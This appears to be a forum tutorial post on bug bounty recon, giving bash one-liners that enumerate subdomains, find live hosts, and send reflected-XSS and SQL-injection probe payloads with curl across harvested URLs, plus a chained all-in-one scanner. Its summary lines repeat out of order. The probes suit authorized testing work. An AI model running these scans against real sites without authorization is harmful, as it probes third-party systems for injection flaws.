- by x32x01 ||
In the world of bug bounty and pentesting, speed and automation are everything. Bash one-liners allow you to combine tools and commands to automate recon and vulnerability hunting - without writing a full script.
Let's explore how to chain tools in one-liners to do recon, XSS, and SQLi detection from your terminal.
Uses assetfinder for passive subdomain discovery
Loops through domains in domains.txt
Filters only active subdomains
Shows HTTP status codes
Stores in live_hosts.txt
Appends a test payload
Detects reflection of
Simple check for Reflected XSS
Sends a ' to trigger SQL error
Greps common SQL error response
Detects potential SQLi endpoints
Uses gau to extract URLs
Replaces parameter values with XSS payload
Tests each modified URL
Take screenshots of all live targets
Fast and headless
Great for visual recon
assetfinder - Subdomain Enumeration
httpx - Host Liveness Detection
curl - Manual Request Testing
qsreplace - Replace query string values
gau - Get All URLs (from Wayback, etc.)
gowitness - Screenshot Tool
Install tools via:
Pro Tip:
Combine with tmux or watch to monitor in real-time. Use parallelization (xargs -P) for faster scans.
Fully automated passive recon + XSS detection using bash only.
Vulnerability Reward Potential
Reflected XSS $50 – $500
SQL Injection $250 – $10,000+
Sensitive Info in Subdomains $100 – $1000+
Recon-Only Findings (Takeover, Admin Panels) $50 – $1500
Start using Bash like a weapon - No GUI, no noise, just pure hacking from terminal.
Follow Hack Training for more real-world tactics!
Let's explore how to chain tools in one-liners to do recon, XSS, and SQLi detection from your terminal.
1. Subdomain Enumeration (Passive Recon)
Code:
cat domains.txt | while read domain; do assetfinder --subs-only $domain >> all_subs.txt; done
2. Live Host Finder with httpx
Code:
cat all_subs.txt | httpx -silent -status-code -threads 50 | tee live_hosts.txt
3. Check for Reflected XSS in Params
Code:
cat live_hosts.txt | while read url; do curl -s "$url?search=<script>alert(1)</script>" | grep -q "<script>alert(1)</script>" && echo "[XSS] $url"; done<script>alert(1)</script> Simple check for Reflected XSS🛠 4. SQLi Vulnerability Tester with Curl + Grep
Code:
cat live_hosts.txt | while read url; do curl -s "$url?id=1'" | grep -qi "sql syntax" && echo "[SQLi] $url"; done
5. Parameter Discovery + XSS Test (with gau + qsreplace)
Code:
gau example.com | grep "=" | qsreplace '<svg/onload=alert(1)>' | while read url; do curl -s $url | grep -q '<svg/onload=alert(1)>' && echo "[XSS] $url"; done
6. Screenshot Live Hosts (Visual Recon)
cat live_hosts.txt | gowitness file -f - --threads 10 Take screenshots of all live targets Fast and headless Great for visual recon
Tools Used:
assetfinder - Subdomain Enumerationhttpx - Host Liveness Detection
curl - Manual Request Testing
qsreplace - Replace query string values
gau - Get All URLs (from Wayback, etc.)
gowitness - Screenshot Tool
Install tools via:
Code:
go install github.com/tomnomnom/assetfinder@latest
go install github.com/projectdiscovery/httpx/cmd/httpx@latest
go install github.com/lc/gau@latest
go install github.com/tomnomnom/qsreplace@latestCombine with tmux or watch to monitor in real-time. Use parallelization (xargs -P) for faster scans.
Final One-Liner Combo (All-in-One)
Code:
cat domains.txt | while read domain; do assetfinder --subs-only $domain; done | httpx -silent | tee live.txt | gau | grep "=" | qsreplace "'\"<script>alert(1)</script>" | while read url; do curl -s $url | grep -q "alert(1)" && echo "[Possible XSS] $url"; done
Bug Bounty Impact:
Vulnerability Reward PotentialReflected XSS $50 – $500
SQL Injection $250 – $10,000+
Sensitive Info in Subdomains $100 – $1000+
Recon-Only Findings (Takeover, Admin Panels) $50 – $1500
Start using Bash like a weapon - No GUI, no noise, just pure hacking from terminal. Follow Hack Training for more real-world tactics!